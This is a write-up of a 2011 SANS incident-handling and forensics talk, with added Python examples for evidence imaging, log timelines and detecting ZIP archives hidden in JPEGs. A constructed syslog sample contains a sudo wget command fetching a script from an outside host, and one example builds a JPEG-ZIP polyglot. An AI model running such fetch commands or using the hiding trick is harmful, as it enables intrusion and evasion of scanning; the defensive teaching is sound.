This SANS Incident Handling & Forensics presentation, delivered in October 2011, provides a comprehensive walkthrough of how organizations should prepare for, identify, contain, and recover from security incidents. It combines process discipline with practical forensic techniques and tooling, emphasizing that methodical response and rigorous evidence handling are the foundations of effective incident management.
About the Presenter
Matthew J. Harmon, Owner of IT Risk, Ltd., LLC, served as a Community Instructor with SANS, Incident Handler, Penetration Tester, Standards Developer within ISO/ITU, IT Auditor, Security Consultant and Researcher, and Risk Analyst. Certifications: GCIH, GSEC, CISSP, CISA, ISO 27001 Lead Auditor. SANS courses taught included SEC 504 “Hacker Techniques, Exploits and Incident Handling,” SEC 464 “Hacker Detection for Systems Administrators” (with Quarterly Continuing Education and Human Sensor Network), and SEC 401 “Security Essentials.”
Incident Response Strategy
Most of the time, responders are called in after an incident or event has already begun. The first steps must be to identify the existing Incident Response Plan and determine who is the Incident Coordinator. If no incident response plan exists, that becomes the first lesson learned.
Core Concepts
- Don’t Panic! Remain Calm.
- Take comprehensive notes. If you don’t have enough time to take notes, you are moving too fast. Slow down. Take a deep breath.
- Get help, immediately. Work in 2x2 pairs.
- Enforce a need-to-know policy.
- Use Out-of-Band Communication.
- Contain the incident and prevent more damage.
- Make a bit-by-bit backup. Never operate on the original source.
- Eradicate the attacker and their hold.
- Get back to business.
- Learn from mistakes made.
The Six Phases of Incident Response
Preparation – Getting ready to counter an attack. This involves establishing policies, procedures and getting management buy-in; establishing network and traffic baselines (watching for gambling, social media, movies, or harmful activity); setting notification guidelines for media; and identifying internal/external CIRTs, CERT contacts, and law enforcement officer (LEO) contacts.
Identification – Determining if an event or incident has occurred. An event has no correlating logs and minimal impact. An incident has corroborating evidence and potential for harm. Responders must verify system configuration, identify failures, declare an incident early so containment can begin, begin chain-of-custody (always working in 2x2 pairs), and notify management to begin CIRT coordination.
Containment – Limiting the scope of damage and stopping the bleeding. Back up the system with a bit-by-bit copy to new media. Never operate from the original data source. Determine risk to continued operations. Keep a low profile, but change passwords on compromised systems and dependent systems.
Eradication – Isolating the attack, determining vectors and exploited vulnerabilities. Implement protection measures to treat attack vectors through network and firewall filters, renaming or re-IPing systems, and if a system cannot be trusted, rebuilding on a more hardened platform. Identify additional vulnerabilities. Locate a clean backup and prepare for recovery.
Recovery – Returning the system to an operational state. Restore, validate, and prevent future attacks. After management has decided to bring the system back into production, monitor for back doors and other attempted exploits.
Lessons Learned – How to prevent this from happening again. Determine the root cause of the attack and what can be done to improve operations to limit risk. Produce a detailed incident report and circulate to appropriate management. Implement changes as approved by management.
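The bit-by-bit copy to new media, the checksum and the chain-of-custody record that the Containment phase above (and the Preserve the Evidence step further down) call for, as an added Python example that is not part of the presentation: it copies a source read-only in fixed blocks the way dd does, hashes source and image, refuses to proceed unless the two match, and appends a two-person custody record. The temporary file standing in for a drive, the record fields and the handler names are constructed for this example; on a real case the source would be a write-blocked block device.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # 1 MiB blocks: a dd-style fixed block size, memory use stays flat


def sha256_of(path):
    """Hash a file in blocks so an image larger than RAM can still be verified."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def image_source(source, image_path):
    """Bit-for-bit copy of `source` onto new media at `image_path`.
    The source is opened read-only and is never written to."""
    with open(source, "rb") as src, open(image_path, "wb") as dst:
        for block in iter(lambda: src.read(CHUNK), b""):
            dst.write(block)
        dst.flush()
        os.fsync(dst.fileno())  # make sure the image really is on the new media
    return os.path.getsize(image_path)


def acquire(source, image_path, custody_log, handler, witness):
    """Image the source, hash both copies, refuse to continue unless they match,
    and append a chain-of-custody record. Two names are required on every
    record (the 2x2 rule)."""
    size = image_source(source, image_path)
    src_hash = sha256_of(source)
    img_hash = sha256_of(image_path)
    if src_hash != img_hash:
        raise RuntimeError("image does not verify against source; stop and re-image")
    record = {
        "time_utc": datetime.now(timezone.utc).isoformat(),
        "source": source,
        "image": image_path,
        "bytes": size,
        "sha256": img_hash,
        "acquired_by": handler,
        "witnessed_by": witness,
        "custody_log": custody_log,
    }
    with open(custody_log, "a") as log:  # append-only: earlier records are never rewritten
        log.write(json.dumps(record) + "\n")
    return record


def verify_image(image_path, expected_sha256):
    """Re-hash an image before analysis (or for court) to show it is unchanged."""
    return sha256_of(image_path) == expected_sha256


def demo():
    """Constructed run: a temp file of random bytes stands in for the original drive."""
    workdir = tempfile.mkdtemp()
    source = os.path.join(workdir, "evidence.bin")
    with open(source, "wb") as f:
        f.write(os.urandom(3 * CHUNK + 12345))  # not block-aligned, like real media
    image = os.path.join(workdir, "evidence.dd")
    custody = os.path.join(workdir, "chain_of_custody.jsonl")
    return acquire(source, image, custody, handler="handler A", witness="handler B")


if __name__ == "__main__":
    rec = demo()
    print(json.dumps(rec, indent=2))
    print("verifies:", verify_image(rec["image"], rec["sha256"]))
```

The hash of the image is recorded at acquisition and re-checked before any analysis step; a mismatch later means the working copy, not the evidence, is what changed, which is exactly the question chain-of-custody exists to answer.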
Forensic Toolkits
SANS Investigative Forensic Toolkit (SIFT) Workstation
Developed by SANS, the SIFT Workstation comes loaded with forensic tools ready to go. It supports images acquired with Expert Witness, RAW (dd), and Advanced Forensic Format (AFF). Key tools include The Sleuth Kit and associated GUIs for filesystem and disk analysis, log2timeline for timeline generation, Pasco for web history examination, and the Volatility Framework for memory analysis, among many more. Covered in SEC 408 and SEC 508.
Download: http://computer-forensics.sans.org/community/downloads
BackTrack
BackTrack by Offensive Computing is focused on penetration, not analysis. It contains many of the same tools (under Forensics) but is not as Incident Handler friendly. Notable tools include Metasploit, Kismet, Ophcrack, Wireshark, and BeEF (Browser Exploit Framework). Covered extensively in SEC 504.
Download: http://www.backtrack-linux.org
Computer Forensics Steps
- What are you investigating? – Scenarios include malware, malicious insider or espionage, phishing, and criminal investigation.
- Document the Scene – Documentation is key. Before touching anything, use your pen and notebook. Photograph, sketch, and label everything. Take copious notes with date and time. These may end up in court.
- Identify Data Sources – Forensics are both in-person and remote. Data sources include servers, workstations, PDAs and smartphones, backups, and network devices such as routers and switches – and people. Logs are your friend; logs build a timeline and give insight. Intrusion Detection Systems, firewalls, and switch ports are all sources.
- Preserve the Evidence – Data extraction occurs both before and after pulling the plug, using methods such as in-line drive duplication and USB imaging with dd (Unix), EnCase by Guidance Software, or FTK (Forensic Toolkit) by Access Data. Back up the data and NEVER use the original source. Maintain chain-of-custody, checksums, and photographs.
- Analyze the Collected Data – Some data will be in log format, timestamped, formatted, and easily translated. Most data will be “hidden” or abstracted. Process, procedures, and tools make this easier. Understanding how technology works and is integrated into business is key.
- Present Findings – Consider the audience: local law enforcement, FBI, Secret Service, corporate Legal, HR, Audit, or InfoSec. Make your case and state your conclusion clearly.
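The "logs build a timeline" point from the Identify Data Sources step, as an added Python example that is not part of the presentation: three constructed log sources (a host syslog, a firewall, an IDS), each with its own timestamp format and timezone, are normalised to UTC and merged into one ordered timeline that can then be pivoted on an address or user. The log lines, host names, addresses and the UTC-5 local-time assumption are all constructed for this example.

```python
import re
from datetime import datetime, timezone, timedelta

# Constructed sample logs for this example (not captured from any real system).
SYSLOG = """\
Oct 12 14:03:51 web01 sshd[2231]: Accepted password for admin from 10.0.5.23 port 51622 ssh2
Oct 12 14:05:07 web01 sudo: admin : TTY=pts/0 ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.9/x.sh
"""
FIREWALL = """\
2011-10-12T19:02:44Z fw01 ACCEPT TCP 10.0.5.23:51622 -> 10.0.1.10:22
2011-10-12T19:05:09Z fw01 ACCEPT TCP 10.0.1.10:40110 -> 203.0.113.9:80
"""
IDS = """\
10/12/2011-14:05:09.118 [**] [1:1000001:1] Outbound HTTP to listed host [**] {TCP} 10.0.1.10:40110 -> 203.0.113.9:80
"""

# Assumptions for the constructed data: the host and the IDS sensor stamp in
# local time (UTC-5) and syslog lines carry no year; the firewall logs in UTC.
LOCAL_TZ = timezone(timedelta(hours=-5))
SYSLOG_YEAR = 2011

SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (.*)$")
FW_RE = re.compile(r"^(\S+) (\S+) (.*)$")
IDS_RE = re.compile(r"^(\d\d/\d\d/\d{4}-\d\d:\d\d:\d\d)\.\d+ (.*)$")


def parse_syslog(line):
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{SYSLOG_YEAR} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return {"ts": ts.replace(tzinfo=LOCAL_TZ).astimezone(timezone.utc),
            "source": "syslog", "host": m.group(2), "msg": m.group(3)}


def parse_firewall(line):
    m = FW_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "source": "firewall", "host": m.group(2), "msg": m.group(3)}


def parse_ids(line):
    m = IDS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%m/%d/%Y-%H:%M:%S")
    return {"ts": ts.replace(tzinfo=LOCAL_TZ).astimezone(timezone.utc),
            "source": "ids", "host": "ids01", "msg": m.group(2)}


def build_timeline(sources=None):
    """Parse every line of every source into one list ordered by UTC time
    (source name breaks ties so the order is deterministic). Lines a parser
    cannot read are returned separately rather than silently dropped."""
    if sources is None:
        sources = [(SYSLOG, parse_syslog), (FIREWALL, parse_firewall), (IDS, parse_ids)]
    events, unparsed = [], []
    for text, parser in sources:
        for line in text.splitlines():
            if not line.strip():
                continue
            ev = parser(line)
            if ev is None:
                unparsed.append(line)
            else:
                events.append(ev)
    events.sort(key=lambda e: (e["ts"], e["source"]))
    return events, unparsed


def events_mentioning(events, needle):
    """Pivot: every event whose text mentions an address, user or host name."""
    return [e for e in events if needle in e["msg"]]


def render(events):
    return "\n".join(f"{e['ts'].isoformat()} {e['source']:8} {e['host']:6} {e['msg']}"
                     for e in events)


if __name__ == "__main__":
    timeline, unparsed = build_timeline()
    print(render(timeline))
    print(f"\n{len(unparsed)} unparsed line(s)")
    print("\npivot on 203.0.113.9:")
    print(render(events_mentioning(timeline, "203.0.113.9")))
```

Merged, the five events read as one story (inbound SSH accepted, login, sudo to a download, outbound connection, IDS alert) that none of the three sources tells on its own; the timezone normalisation is what makes the firewall's 19:05:09Z and the sensor's 14:05:09 line up as the same moment. The unparsed list is kept deliberately, since a line the parser cannot read is a gap in the timeline you need to know about.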
Hiding Data Intentionally
Despite what CSI might suggest, you cannot “enhance the pixels” – but you can store data inside pictures. An image file can contain a ZIP file appended to it. This is not steganography; it exploits how file formats work.
File formats are designated by magic numbers, not file extensions. Extensions like .jpg and .zip are for humans only. A JPEG with a ZIP appended at the end works because each format’s parser reads from its expected position. Gary Kessler maintains a comprehensive reference of file signatures at http://www.garykessler.net/library/file_sigs.html.
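To show what "magic numbers, not extensions" looks like in practice, here is an added Python example that is not part of the presentation: it identifies a file by its leading signature, checks whether a file that starts as a JPEG has a ZIP archive following the end-of-image marker, and lists that archive's members by letting the ZIP parser do what it always does, locate its directory from the end of the file. The sample JPEG-plus-ZIP polyglot is constructed in the code (it is not a valid picture, only the markers matter), and the small signature table holds a handful of values of the kind the file-signature reference above catalogues.

```python
import io
import zipfile

# A few signatures at offset 0 (the kind of entry a file-signature table holds).
MAGIC = {
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"GIF87a": "GIF image",
    b"GIF89a": "GIF image",
    b"%PDF-": "PDF document",
    b"PK\x03\x04": "ZIP archive",
}
JPEG_EOI = b"\xff\xd9"   # JPEG end-of-image marker
ZIP_LOCAL = b"PK\x03\x04"  # ZIP local file header
ZIP_EOCD = b"PK\x05\x06"   # ZIP end-of-central-directory record


def identify_by_magic(data):
    """Classify by leading bytes, ignoring whatever extension the name carries."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def find_trailing_zip(data):
    """For data that starts as a JPEG, return the offset where ZIP data begins
    after the end-of-image marker, or None. The EOI search is a heuristic
    (embedded thumbnails also contain FFD9), so a hit is only reported when a
    ZIP local header follows an EOI and the file also carries an
    end-of-central-directory record after it."""
    if identify_by_magic(data) != "JPEG image":
        return None
    eoi = data.find(JPEG_EOI)
    if eoi < 0:
        return None
    start = data.find(ZIP_LOCAL, eoi + len(JPEG_EOI))
    if start < 0 or data.rfind(ZIP_EOCD) < start:
        return None
    return start


def list_hidden_members(data):
    """The ZIP parser finds its central directory from the END of the file,
    so the JPEG prefix is simply ignored and the archive opens as normal."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_polyglot():
    """Constructed sample: a minimal JPEG-shaped byte string with a small ZIP
    appended. The member names and contents are made up for the example."""
    jpeg = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
            + b"\x00" * 64 + JPEG_EOI)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", "constructed hidden content")
        zf.writestr("secret/list.csv", "a,b,c\n")
    return jpeg + buf.getvalue()


def scan(data):
    """What a defender's scanner would report for one file's bytes."""
    kind = identify_by_magic(data)
    start = find_trailing_zip(data)
    members = list_hidden_members(data) if start is not None else []
    return {"declared": kind, "zip_offset": start, "members": members}


if __name__ == "__main__":
    print(scan(build_polyglot()))
    print(scan(b"\xff\xd8\xff\xe0" + b"\x00" * 16 + JPEG_EOI))
```

A scanner that stops at the offset-0 signature calls the polyglot a clean JPEG, which is the point of the trick; checking what follows the end-of-image marker is the cheap addition that catches it. On real images, look past the last FFD9 rather than the first when thumbnails are present, and treat a ZIP end-of-central-directory record anywhere after the image data as worth a closer look.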
Hiding Data Accidentally: Solid State Drives
Solid State Drives (SSDs) bring new questions to forensic activities. New models of SSD come with the TRIM function. Windows 7, Windows Server 2008, and Linux kernel 2.6.33 are TRIM compatible. TRIM performs “garbage collection,” essentially defeating forensic activities by zeroing data and complicating drive wiping. The presentation illustrated the difference between SSD behavior without TRIM (where deleted data remains recoverable) and with TRIM (where the drive proactively zeros freed blocks).
SANS Course Information
- SEC 504, Hacker Techniques, Exploits and Incident Handling, taught locally starting January 18, 2012 with Matthew J. Harmon over 10 weeks – http://www.sans.org/mentor/details.php?nid=26769 or http://tinyurl.com/SEC504MplsJan2012
- SEC 464, Hacker Detection for Systems Administrators, taught at your convenience over 2 days
- SEC 401, Security Essentials starting January 26, 2012 with Eric Lucero over 10 weeks – http://www.sans.org/mentor/details.php?nid=26649
Contact and Resources
Matthew J. Harmon – +1 612/987.0115 – matthew@itriskltd.com – IT Risk, Ltd., LLC – http://www.itriskltd.com
The SANS Institute: http://www.sans.org | http://computer-forensics.sans.org/ | http://pen-testing.sans.org
This work is licensed under the Creative Commons Attribution-NonCommercial 3.0 Unported License (http://creativecommons.org/licenses/by-nc/3.0/).